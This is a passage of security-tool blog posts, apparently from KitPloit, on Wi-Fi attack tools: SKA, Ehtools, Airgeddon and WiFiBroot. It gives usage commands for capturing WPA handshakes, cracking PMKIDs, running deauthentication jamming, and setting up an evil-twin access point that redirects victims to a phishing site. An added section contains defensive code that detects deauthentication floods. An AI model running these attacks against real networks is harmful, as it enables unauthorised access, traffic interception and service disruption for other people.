<li>optparse: parser for <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="command line">command line</a> options. <a href="https://docs.python.org/3/library/optparse.html" rel="nofollow" target="_blank" title="https://docs.python.org/3/library/optparse.html">https://docs.python.org/3/library/optparse.html</a></li>
<li>Capstone: disassembly framework. <a href="http://www.capstone-engine.org/" rel="nofollow" target="_blank" title="http://www.capstone-engine.org/">http://www.capstone-engine.org/</a></li>
<li>re: regex module.</li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/arthastang/Router-Exploit-Shovel" rel="nofollow" target="_blank" title="Download Router-Exploit-Shovel">Download Router-Exploit-Shovel</a></span></b></div>
<h1>SKA - Simple Karma Attack</h1>
<p>Published 2019-09-23</p>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-_fuhXy72X-k/XYAg6h2jqRI/AAAAAAAAQY0/Ao2rt028hsMwBuTQ4r4hdd23pon6mAt6gCNcBGAsYHQ/s1600/SKA_5_logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="580" data-original-width="1600" height="232" src="https://1.bp.blogspot.com/-_fuhXy72X-k/XYAg6h2jqRI/AAAAAAAAQY0/Ao2rt028hsMwBuTQ4r4hdd23pon6mAt6gCNcBGAsYHQ/s640/SKA_5_logo.png" width="640" /></a></div>
<br />
SKA allows you to implement a very simple and fast <a href="https://en.wikipedia.org/wiki/KARMA_attack" rel="nofollow" target="_blank" title="karma">karma</a> attack.<br />
You can sniff probe requests to choose the fake AP name or, if you prefer, enter the AP name manually (<a href="https://en.wikipedia.org/wiki/Evil_twin_(wireless_networks)" rel="nofollow" target="_blank" title="evil twin attack">evil twin attack</a>).<br />
Once the target has connected to your WLAN you can activate HTTP redirection and perform a MITM attack.<br />
<a name='more'></a><br />
<span style="font-size: x-large;"><b>Details</b></span><br />
The script implements these steps:<br />
<ol>
<li> selection of NICs for the attack (one for LAN and one for WAN)<br />
</li>
<li> capture of probe requests to choose the fake AP name (<em><strong>tcpdump</strong></em>)<br />
</li>
<li> activation of the fake AP (<em><strong>hostapd</strong></em> and <em><strong>dnsmasq</strong></em>)<br />
<ul>
<li>the new AP has a DHCP server that provides a valid IP to the target and prevents possible alerts on the victim device</li>
</ul>
</li>
<li> activation of HTTP redirection (<em><strong>iptables</strong></em>)<br />
<ul>
<li>only HTTP requests are redirected to the fake site; HTTPS traffic continues to be routed normally</li>
</ul>
</li>
<li> activation of the <em><strong>Apache</strong></em> server hosting the <a href="https://www.kitploit.com/search/label/Phising" target="_blank" title="phising">phishing</a> site<br />
</li>
<li> at the end of the attack the script cleans up all changes and restores the Apache configuration<br />
</li>
</ol>
<br />
<span style="font-size: x-large;"><b>Screenshots</b></span><br />
<div align="center">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-gifYLBjvvo0/XYAhBLvCw2I/AAAAAAAAQY4/C6HOe6RXlVsoXUQaE2WdcPwIYHVAQ2r9wCNcBGAsYHQ/s1600/SKA_6_complete_execution.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="559" data-original-width="988" height="362" src="https://1.bp.blogspot.com/-gifYLBjvvo0/XYAhBLvCw2I/AAAAAAAAQY4/C6HOe6RXlVsoXUQaE2WdcPwIYHVAQ2r9wCNcBGAsYHQ/s640/SKA_6_complete_execution.png" width="640" /></a></div>
</div>
Press CTRL-C to kill all processes and restore the configuration files. <br />
<br />
<div align="center">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-jmRjU-rTAIM/XYAhFXlv4OI/AAAAAAAAQY8/lgHvY2bmecAo3xv-v_AIa-Y8Aq1yXDCZwCNcBGAsYHQ/s1600/SKA_7_restoring_before_exit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="199" data-original-width="421" src="https://1.bp.blogspot.com/-jmRjU-rTAIM/XYAhFXlv4OI/AAAAAAAAQY8/lgHvY2bmecAo3xv-v_AIa-Y8Aq1yXDCZwCNcBGAsYHQ/s1600/SKA_7_restoring_before_exit.png" /></a></div>
</div>
<span style="font-size: x-large;"><b>FAQ</b></span><br />
SKA alerts you if there are problems with the NetworkManager daemon or the Apache configuration file. You can also find answers to common problems at the links below:<br />
<ol>
<li> <a href="https://rootsh3ll.com/evil-twin-attack/" rel="nofollow" target="_blank" title="resolve Network Manager conflict 1">resolve Network Manager conflict 1</a><br />
section: "Resolve <a href="https://www.kitploit.com/search/label/Airmon-ng" target="_blank" title="airmon-ng">airmon-ng</a> and Network Manager Conflict"<br />
</li>
<li> <a href="https://github.com/sensepost/mana/issues/13" rel="nofollow" target="_blank" title="resolve Network Manager conflict 2">resolve Network Manager conflict 2</a><br />
</li>
<li> <a href="https://unix.stackexchange.com/questions/257274/how-to-disable-dnsmasq" rel="nofollow" target="_blank" title="disable dnsmasq">disable dnsmasq</a><br />
</li>
</ol>
<br />
<span style="font-size: large;"><b>In summary</b></span><br />
<ol>
<li> Disable the DNS line in your NetworkManager configuration file (look in /etc/NetworkManager/):<br />
<code>#dns=dnsmasq</code><br />
</li>
<li> Add the MAC of your <a href="https://www.kitploit.com/search/label/Wireless" target="_blank" title="wireless">wireless</a> adapter to the unmanaged devices so that <em><strong>hostapd</strong></em> works properly:<br />
<code>unmanaged-devices=mac:XX:XX:XX:XX:XX:XX</code></li>
</ol>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Leviathan36/SKA" rel="nofollow" target="_blank" title="Download SKA">Download SKA</a></span></b></div>
<h1>Ehtools - Framework Of Serious Wi-Fi Penetration Tools</h1>
<p>Published 2019-09-03</p>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-0Z9Yw_jbQjk/XWsJ7rfgB-I/AAAAAAAAQL8/3dvhtXh_i_wTZql3emY9PnfcbQuOTJw-QCLcBGAs/s1600/ehtools_8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="829" data-original-width="1292" height="410" src="https://1.bp.blogspot.com/-0Z9Yw_jbQjk/XWsJ7rfgB-I/AAAAAAAAQL8/3dvhtXh_i_wTZql3emY9PnfcbQuOTJw-QCLcBGAs/s640/ehtools_8.png" width="640" /></a></div>
<br />
Wi-Fi tools keep getting more and more accessible to beginners, and the Ehtools Framework is a framework of serious penetration tools that can be explored easily from within it. This powerful and simple tool can be used for everything from installing new add-ons to grabbing a WPA handshake in a matter of seconds. Plus, it's easy to install, set up, and utilize.<br />
<a name='more'></a><br />
<span style="font-size: large;"><b>How to install ehtools</b></span><br />
<pre><code>cd ehtools
chmod +x install.sh
./install.sh</code></pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-V0TexluZEmM/XWsKcx5fv7I/AAAAAAAAQME/MHZupwJl1Zs5Ud5MVGiuv6-HXT93an2mACLcBGAs/s1600/ehtools_9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="832" data-original-width="1294" height="410" src="https://1.bp.blogspot.com/-V0TexluZEmM/XWsKcx5fv7I/AAAAAAAAQME/MHZupwJl1Zs5Ud5MVGiuv6-HXT93an2mACLcBGAs/s640/ehtools_9.png" width="640" /></a></div>
<br />
<span style="font-size: large;"><b>Selecting version of framework</b></span><br />
INFO: after executing install.sh you will be asked to select the version of Ehtools Framework, PRO or LITE.<br />
Select LITE if you did not buy Ehtools Framework PRO.<br />
If you bought Ehtools Framework PRO, select PRO.<br />
<br />
<pre><code>./install.sh
What version of Ehtools Framework do you want to install?(pro/lite):
If you did not buy Ehtools Framework PRO, select LITE!
If you bought Ehtools Framework PRO, select PRO!
(version)></code></pre>
If you select Ehtools Framework PRO, you will need to activate it with an Ehtools Activation Key, which you need to buy on the ehtools site. If you have an Ehtools Activation Key, read the following instructions.<br />
<br />
<span style="font-size: large;"><b>How to activate ehtools PRO</b></span><br />
You can buy this key on the ehtools site for one dollar! The key is used to activate ehtools PRO: enter it in the activation-key input field of install.sh, and then you can install ehtools and use it only for educational purposes!<br />
<br />
WARNING: The key works only one week then it changes!<br />
You need to have time to enter it before it is updated!<br />
<pre><code>./install.sh</code></pre>
Enter your ehtools activation key!
You can buy it on the ehtools site!
<br />
<pre><code>(activation_key)> </code></pre>
Also, we do not recommend changing the source code of ehtools, because it is very complex and you could break something and disrupt the framework!<br />
WARNING: We do not recommend changing the ehtools source code<br />
because you can disrupt the framework!<br />
<br />
<span style="font-size: large;"><b>How to uninstall ehtools</b></span><br />
<pre><code>ehtools -r</code></pre>
WARNING: Do not do this if you want to reinstall<br />
the ehtools PRO that you bought, because<br />
you will need to buy it one more time!<br />
<br />
<span style="font-size: large;"><b>Attacking frameworks</b></span><br />
Most new Wi-Fi hacking tools rely on many of the same underlying attacks, and scripts that automate using other more familiar tools like Aireplay-ng are often referred to as frameworks. These frameworks try to organize tools in smart or useful ways to take them a step beyond the functionality or usability of the original program.<br />
An excellent example of this are programs that integrate scanning tools like Airodump-ng, attacks like WPS Pixie-Dust, and cracking tools like Aircrack-ng to create an easy-to-follow attack chain for beginners. Doing this makes the process of using these tools easier to remember and can be seen as sort of a guided tour. While each of these attacks is possible without the hand-holding, the result can be faster or more convenient than trying to do so yourself.<br />
An example of this we've covered is the Airgeddon framework, a wireless attack framework that does useful things like automating the target selection process and eliminating the time a user spends copying and pasting information between programs. This saves valuable time for even experienced pentesters but has the disadvantage of preventing beginners from understanding what's happening "under the hood" of the attack. While this is true, most of these frameworks are fast, efficient, and dead simple to use, enabling even beginners to take on and disable an entire network.<br />
<br />
<span style="font-size: large;"><b>UX/UI improvements for beginners</b></span><br />
The Ehtools Framework starts by merely typing ehtools or eht into a terminal window; on the first run it then asks for the names of your network interfaces. It uses the names you supply to connect to the tools needed to execute any attacks you select. Aside from that initial input, the majority of the possible attacks can be performed merely by choosing the option number from the menu. This means you can grab a network handshake or download a new hacking tool like Pupy by just selecting one of the menu options.<br />
<br />
<span style="font-size: large;"><b>Use basic networking tools</b></span><br />
To begin, we can access data about the network we're currently connected to, as well as any network interfaces, from the main menu. Here, we can find <a href="https://www.kitploit.com/search/label/Local%20Information" target="_blank" title="local information">local information</a> by just typing l to pull up local IP information, as seen below.<br />
This allows us to do things like scan the network for other devices. This part of Ehtools Framework gives us better visibility on a network and situational awareness of what devices are around us. The various information can be broken down as follows:<br />
<pre><code>(ehtools)> if</code></pre>
INFO: Runs ifconfig and gives the names and information
about all network devices.
<br />
<pre><code>(ehtools)> 1</code></pre>
INFO: Enable wlan0.<br />
(d1 disables it)<br />
<pre><code>(ehtools)> 2</code></pre>
INFO: Enable wlan0mon.<br />
(d2 disables it)<br />
<pre><code>(ehtools)> 3</code></pre>
INFO: Randomize or set the MAC address to a specific value.<br />
<pre><code>(ehtools)> 7</code></pre>
INFO: View the public IP address your computer
is leaving on sites you visit.<br />
<pre><code>(ehtools)> 19</code></pre>
INFO: Look up the physical address of a given
IP address to determine its approximate location.<br />
<pre><code>(ehtools)> scan</code></pre>
INFO: Start an ARP scan on the network
to discover nearby devices.<br />
<pre><code>(ehtools)> start</code></pre>
INFO: Start monitor mode on the wireless network adapter.<br />
<pre><code>(ehtools)> stop</code></pre>
INFO: Stop wireless monitor mode on the network adapter.
<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/entynetproject/ehtools" rel="nofollow" target="_blank" title="Download Ehtools">Download Ehtools</a></span></b></div>
<span style="font-size: x-large;"><b>Airgeddon v9.21 - A Multi-use Bash Script for Linux Systems to Audit Wireless Networ</b></span> (posted 2019-08-25)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-xLQuq3asE9I/XVg5VkT42GI/AAAAAAAAQG4/b0k7agQuZHMdtFJoB_USy6_6jQPxaKP8QCLcBGAs/s1600/airgeddon_scrs1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="489" data-original-width="736" height="424" src="https://1.bp.blogspot.com/-xLQuq3asE9I/XVg5VkT42GI/AAAAAAAAQG4/b0k7agQuZHMdtFJoB_USy6_6jQPxaKP8QCLcBGAs/s640/airgeddon_scrs1.png" width="640" /></a></div>
<br />
<blockquote>
This is a multi-use bash script for <a href="https://www.kitploit.com/search/label/Linux" target="_blank" title="Linux">Linux</a> systems to <a href="https://www.kitploit.com/search/label/Audit" target="_blank" title="audit">audit</a> <a href="https://www.kitploit.com/search/label/Wireless" target="_blank" title="wireless">wireless</a> networks.</blockquote>
<a name='more'></a><br />
All the needed info about how to "install | use | enjoy" <code>airgeddon</code> is present at <a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki" rel="nofollow" target="_blank" title="Github's Wiki">Github's Wiki</a>.<br />
<ul>
<li> <em>I. Content & Features</em><br />
<ul>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki" rel="nofollow" target="_blank" title="Home">Home</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Features" rel="nofollow" target="_blank" title="Features">Features</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Screenshots" rel="nofollow" target="_blank" title="Screenshots">Screenshots</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Wallpapers" rel="nofollow" target="_blank" title="Wallpapers">Wallpapers</a></li>
</ul>
</li>
<li> <em>II. Requirements</em><br />
<ul>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Requirements" rel="nofollow" target="_blank" title="Requirements">Requirements</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Compatibility" rel="nofollow" target="_blank" title="Compatibility">Compatibility</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Essential%20Tools" rel="nofollow" target="_blank" title="Essential Tools">Essential Tools</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Optional%20Tools" rel="nofollow" target="_blank" title="Optional Tools">Optional Tools</a> <ul>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/BeEF%20Tips" rel="nofollow" target="_blank" title="BeEF Tips">BeEF Tips</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Hashcat%20Tips" rel="nofollow" target="_blank" title="Hashcat Tips">Hashcat Tips</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Bettercap%20Tips" rel="nofollow" target="_blank" title="Bettercap Tips">Bettercap Tips</a></li>
</ul>
</li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Update%20Tools" rel="nofollow" target="_blank" title="Update Tools">Update Tools</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Internal%20Tools" rel="nofollow" target="_blank" title="Internal Tools">Internal Tools</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Known%20incompatibilities" rel="nofollow" target="_blank" title="Known incompatibilities">Known incompatibilities</a></li>
</ul>
</li>
<li> <em>III. Getting started</em><br />
<ul>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Installation%20&%20Usage" rel="nofollow" target="_blank" title="Installation & Usage">Installation & Usage</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Options" rel="nofollow" target="_blank" title="Options">Options</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker" rel="nofollow" target="_blank" title="Docker">Docker</a> <ul>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux" rel="nofollow" target="_blank" title="Linux">Linux</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Mac%20OSX" rel="nofollow" target="_blank" title="Mac OSX">Mac OSX</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Windows" rel="nofollow" target="_blank" title="Windows">Windows</a></li>
</ul>
</li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Other%20Sources" rel="nofollow" target="_blank" title="Other Sources">Other Sources</a></li>
</ul>
</li>
<li> <em>IV. Project & Development</em><br />
<ul>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Supported%20Languages" rel="nofollow" target="_blank" title="Supported Languages">Supported Languages</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Contributing-&-Code-of-Conduct" rel="nofollow" target="_blank" title="Contributing & Code of Conduct">Contributing & Code of Conduct</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Changelog" rel="nofollow" target="_blank" title="Changelog">Changelog</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Disclaimer%20&%20License" rel="nofollow" target="_blank" title="Disclaimer & License">Disclaimer & License</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Contact" rel="nofollow" target="_blank" title="Contact">Contact</a></li>
</ul>
</li>
<li> <em>V. Acknowledgments & References</em><br />
<ul>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Hat%20Tip%20To" rel="nofollow" target="_blank" title="Hat Tip To">Hat Tip To</a></li>
<li><a href="https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Inspiration" rel="nofollow" target="_blank" title="Inspiration">Inspiration</a></li>
</ul>
</li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/v1s1t0r1sh3r3/airgeddon" rel="nofollow" target="_blank" title="Download Airgeddon">Download Airgeddon</a></span></b></div>
<span style="font-size: x-large;"><b>WiFiBroot - A WiFi Pentest Cracking Tool For WPA/WPA2 (Handshake, PMKID, Cracking, EAPOL, Deauthentication)</b></span> (posted 2019-08-04)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-oBcLGxBUo-s/XT-teTgHFJI/AAAAAAAAP4Q/P8Y6vpxKxCAXU-6fapr1XPyxyDvjWFlVACLcBGAs/s1600/WiFiBroot_1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="200" data-original-width="1000" height="128" src="https://1.bp.blogspot.com/-oBcLGxBUo-s/XT-teTgHFJI/AAAAAAAAP4Q/P8Y6vpxKxCAXU-6fapr1XPyxyDvjWFlVACLcBGAs/s640/WiFiBroot_1.jpeg" width="640" /></a></div>
<br />
WiFiBroot is built to provide an all-in-one facility for cracking WiFi (WPA/WPA2) networks. It heavily depends on <strong>scapy</strong>, a well-featured packet <a href="https://www.kitploit.com/search/label/Manipulation" target="_blank" title="manipulation">manipulation</a> library in Python. Almost every process within it depends in some way on scapy layers and functions, except for switching the <a href="https://www.kitploit.com/search/label/Wireless" target="_blank" title="wireless">wireless</a> interface to a different channel. That is done via the native Linux command <strong>iwconfig</strong>, for which you may need <em>sudo</em> privileges. It currently provides <strong>four</strong> independent working modes to deal with target networks. Two of them are online cracking methods, while a third runs in offline mode; the offline mode is provided to crack hashes saved from the first two modes. The fourth is for deauthentication attacks on a wireless network and can also be used as a jamming handler. It can be run on a variety of Linux platforms and requires at least a TP-Link WN727N to operate properly.<br />
<a name='more'></a><br />
<span style="font-size: x-large;"><b>Installation:</b></span><br />
WiFiBroot heavily depends on scapy, so you will need scapy installed. Almost every other library it uses is likely already present on your system. Make sure the scapy version you install is <code><=2.4.0</code>; newer versions are likely to throw unknown errors.<br />
<pre><code>$ sudo pip install scapy==2.4.0</code></pre>
The script is supposed to be run under <strong>sudo</strong> but it will still work even if not run under the root mode. The basic necessary arguments are:<br />
<pre><code>$ sudo python wifibroot.py -i [interface] -d /path/to/dictionary -m [mode]</code></pre>
<br />
<span style="font-size: x-large;"><b>Documentation :</b></span><br />
WiFiBroot uses modes to identify which attack you want to perform on your target. Currently, there are three available modes. The usage of each mode can be seen by supplying the <strong>--help/-h</strong> option right after the <strong>-m/--mode</strong> option. Here's a list of available modes and what they do:<br />
<br />
<span style="font-size: large;"><b>Modes:</b></span><br />
<pre><code>Syntax:
    $ python wifibroot.py [--mode [modes]] [--options]
    $ python wifibroot.py --mode 2 -i wlan1mon --verbose -d /path/to/list -w pmkid.txt

Modes:
    #     Description                                     Value
    01    Capture 4-way handshake and crack MIC code      1
    02    Captures and Crack PMKID (PMKID Attack)         2
    03    Perform Manual cracking on available
          capture types. See --list-types                 3
    04    Deauthentication. Disconnect two stations
          and jam the traffic.                            4

Use -h, --help after -m, --mode to get help on modes.</code></pre>
Each mode has a specific purpose and has its own options:<br />
<br />
<span style="font-size: large;"><b>HANDSHAKE:</b></span><br />
<pre><code>Mode:
    01    Capture 4-way handshake and crack MIC code      1

Options:
    Args               Description                              Required
    -h, --help         Show this help manual                    NO
    -i, --interface    Monitor Interface to use                 YES
    -v, --verbose      Turn off Verbose mode.                   NO
    -t, --timeout      Time Delay between two deauth
                       requests.                                NO
    -d, --dictionary   Dictionary for Cracking                  YES
    -w, --write        Write Captured handshake to
                       a separate file                          NO
    --deauth           Number of Deauthentication
                       frames to send                           NO

Filters:
    -e, --essid        ESSID of listening network
    -b, --bssid        BSSID of target network.
    -c, --channel      Channel interface should be listening
                       on. Default: ALL</code></pre>
<br />
<span style="font-size: large;"><b>PMKID ATTACK</b></span><br />
<pre><code>Mode:
    02    Captures and Crack PMKID (PMKID Attack)         1

Options:
    Args               Description                              Required
    -h, --help         Show this help manual                    NO
    -i, --interface    Monitor Interface to use                 YES
    -v, --verbose      Turn off Verbose mode.                   NO
    -d, --dictionary   Dictionary for Cracking                  YES
    -w, --write        Write Captured handshake to
                       a separate file                          NO

Filters:
    -e, --essid        ESSID of listening network
    -b, --bssid        BSSID of target network.
    -c, --channel      Channel interface should be listening
                       on. Default: ALL</code></pre>
<br />
<span style="font-size: large;"><b>Offline Cracking</b></span><br />
<pre><code>Mode:
    03    Perform Manual cracking on available capture
          types. See --list-types                         3

Options:
    Args               Description                              Required
    -h, --help         Show this help manual                    NO
    --list-types       List available cracking types            NO
    --type             Type of capture to crack                 YES
    -v, --verbose      Turn off Verbose mode.                   NO
    -d, --dictionary   Dictionary for Cracking                  YES
    -e, --essid        ESSID of target network.
                       Only for HANDSHAKE Type                  YES
    -r, --read         Captured file to crack                   YES</code></pre>
<br />
<span style="font-size: large;"><b>DEAUTHENTICATION ATTACK (Stress Testing)</b></span><br />
<pre><code>Mode:
    04    Deauthentication. Disconnect two stations
          and jam the traffic.                            4

Options:
    Args               Description                              Required
    -h, --help         Show this help manual                    NO
    -i, --interface    Monitor Mode Interface to use            YES
    -0, --count        Number of Deauthentication
                       frames to send. '0' specifies
                       unlimited frames                         YES
    --ap               Access Point MAC Address                 NO
    --client           STA (Station) MAC Address                NO</code></pre>
<br />
<span style="font-size: large;"><b>Examples</b></span><br />
To Capture 4-way handshake and crack MIC code:<br />
<pre><code>$ python wifibroot.py --mode 1 -i wlan1mon --verbose -d dicts/list.txt -w output.cap </code></pre>
To Capture and Crack PMKID:<br />
<pre><code>$ python wifibroot.py --mode 2 -i wlan1mon --verbose -d dicts/list.txt -w output.txt</code></pre>
Offline Crack <a href="https://www.kitploit.com/search/label/Handshake" target="_blank" title="Handshake">Handshake</a> and PMKID:<br />
<pre><code>$ python wifibroot.py --mode 3 --type handshake --essid "TARGET ESSID" --verbose -d dicts/list.txt --read output.cap
$ python wifibroot.py --mode 3 --type pmkid --verbose -d dicts/list.txt --read output.txt</code></pre>
Deauthentication attack in various form:<br />
<pre><code># Ultimate Deauthentication attack:
$ python wifibroot.py --mode 4 -i wlan1mon -00 --verbose
# Disconnect All Clients from Acess Point:
$ python wifibroot.py --mode 4 -i wlan1mon --ap [AP MAC] --verbose
# Disconnect a Specific Client:
$ python wifibroot.py --mode 4 -i wlan1mon --ap [AP MAC] --client [STA MAC] --verbose</code></pre>
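The deauthentication mode above works because, on networks without 802.11w Protected Management Frames, a deauthentication frame is unauthenticated and any radio that spoofs the AP's address can send one. From a defender's side, the same property makes the attack easy to spot: a burst of deauthentication frames against one BSSID, often with a broadcast destination, far above the rate seen during normal roaming. The following is an added example, not code from WiFiBroot or from this post: a small wireless-IDS style detector that parses the 802.11 MAC header of raw management frames (type 0, subtype 12 is deauthentication), keeps a sliding window per BSSID, and raises an alert when the count in that window crosses a threshold. The frame stream, MAC addresses (locally administered, constructed), window and threshold values are all assumptions for the demo; in practice the frames would come from a monitor-mode capture and the threshold would be tuned to the site.<br />

```python
"""Detect 802.11 deauthentication floods in a stream of raw management frames.

Added, defender-side example (not part of WiFiBroot). All frames below are
constructed inline so the script runs offline; a real deployment would feed
frames from a monitor-mode capture instead.
"""
from collections import defaultdict, deque
import struct

MGMT_TYPE = 0            # 802.11 frame type 0 = management
SUBTYPE_BEACON = 0x8
SUBTYPE_DEAUTH = 0xC     # deauthentication
BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed, locally administered addresses for the demo (assumptions).
AP = "02:00:00:00:aa:01"
STA = "02:00:00:00:cc:01"


def mac_to_bytes(mac: str) -> bytes:
    return bytes(int(octet, 16) for octet in mac.split(":"))


def bytes_to_mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_mgmt_frame(subtype, da, sa, bssid, reason=None, seq=0) -> bytes:
    """Build a minimal 802.11 management frame (test data only).

    Layout: frame control (2) | duration (2) | addr1/DA (6) | addr2/SA (6)
            | addr3/BSSID (6) | sequence control (2) | [reason code (2)]
    """
    frame_control = (MGMT_TYPE << 2) | (subtype << 4)   # protocol version 0
    frame = struct.pack("<BBH", frame_control, 0, 0)     # FC byte, flags, duration
    frame += mac_to_bytes(da) + mac_to_bytes(sa) + mac_to_bytes(bssid)
    frame += struct.pack("<H", seq << 4)                 # seq number, fragment 0
    if reason is not None:
        frame += struct.pack("<H", reason)               # deauth/disassoc reason
    return frame


def parse_mgmt_frame(frame: bytes):
    """Return a dict for a management frame, or None for other/short frames."""
    if len(frame) < 24:
        return None
    fc = frame[0]
    if (fc >> 2) & 0x3 != MGMT_TYPE:
        return None
    subtype = (fc >> 4) & 0xF
    reason = None
    if subtype == SUBTYPE_DEAUTH and len(frame) >= 26:
        reason = struct.unpack_from("<H", frame, 24)[0]
    return {
        "subtype": subtype,
        "da": bytes_to_mac(frame[4:10]),
        "sa": bytes_to_mac(frame[10:16]),
        "bssid": bytes_to_mac(frame[16:22]),
        "reason": reason,
    }


class DeauthFloodDetector:
    """Per-BSSID sliding-window counter over deauthentication frames."""

    def __init__(self, window_s: float = 1.0, threshold: int = 10):
        self.window_s = window_s
        self.threshold = threshold
        self._seen = defaultdict(deque)   # bssid -> deque of (ts, is_broadcast)

    def feed(self, ts: float, frame: bytes):
        """Consume one frame; return an alert dict when the threshold is hit."""
        f = parse_mgmt_frame(frame)
        if f is None or f["subtype"] != SUBTYPE_DEAUTH:
            return None
        q = self._seen[f["bssid"]]
        q.append((ts, f["da"] == BROADCAST))
        while q and ts - q[0][0] > self.window_s:      # drop expired entries
            q.popleft()
        if len(q) >= self.threshold:
            alert = {"at": ts, "bssid": f["bssid"], "count": len(q),
                     "window_s": self.window_s, "reason": f["reason"],
                     "broadcast": any(b for _, b in q)}
            q.clear()                                    # re-arm for next burst
            return alert
        return None


def detect(stream, window_s: float = 1.0, threshold: int = 10):
    """Run the detector over (timestamp, frame) pairs; return all alerts."""
    det = DeauthFloodDetector(window_s, threshold)
    alerts = []
    for ts, frame in sorted(stream, key=lambda x: x[0]):
        alert = det.feed(ts, frame)
        if alert:
            alerts.append(alert)
    return alerts


def sample_stream():
    """Constructed capture: beacons, a little benign deauth noise, then a flood."""
    frames = []
    for i in range(5):                                   # normal beacons
        frames.append((i * 0.1, build_mgmt_frame(SUBTYPE_BEACON, BROADCAST, AP, AP, seq=i)))
    for i in range(3):                                   # one client, reason 3 (STA leaving)
        frames.append((1.0 + i, build_mgmt_frame(SUBTYPE_DEAUTH, STA, AP, AP, reason=3, seq=10 + i)))
    for i in range(12):                                  # broadcast burst, reason 7
        frames.append((5.0 + i * 0.05, build_mgmt_frame(SUBTYPE_DEAUTH, BROADCAST, AP, AP, reason=7, seq=20 + i)))
    return frames


if __name__ == "__main__":
    for a in detect(sample_stream()):
        print(f"ALERT t={a['at']:.2f}s bssid={a['bssid']} deauths={a['count']} "
              f"in {a['window_s']}s broadcast={a['broadcast']} reason={a['reason']}")
```

The three spaced-out deauths to a single station never reach the threshold, while the broadcast burst triggers one alert on the tenth frame and the detector re-arms so a sustained flood is reported once per window rather than once per frame. Alerting on the reason code and on a broadcast destination is useful context but not the trigger: a legitimate AP rarely deauthenticates everyone at once, and the rate is what separates an attack from roaming noise. Enabling 802.11w (PMF) on the AP and clients is the mitigation that removes the attack surface itself.<br />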
<br />
<span style="font-size: x-large;"><b>Support</b></span><br />
Website: <a href="https://www.shellvoide.com/" rel="nofollow" target="_blank" title="https://www.shellvoide.com">https://www.shellvoide.com</a><br />
Twitter: <a href="https://twitter.com/hash3liZer" rel="nofollow" target="_blank" title="@hash3liZer">@hash3liZer</a><br />
Email: <a href="mailto://admin@shellvoide.com" rel="nofollow" target="_blank" title="admin@shellvoide.com">admin@shellvoide.com</a><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/hash3liZer/WiFiBroot" rel="nofollow" target="_blank" title="Download WiFiBroot">Download WiFiBroot</a></span></b></div>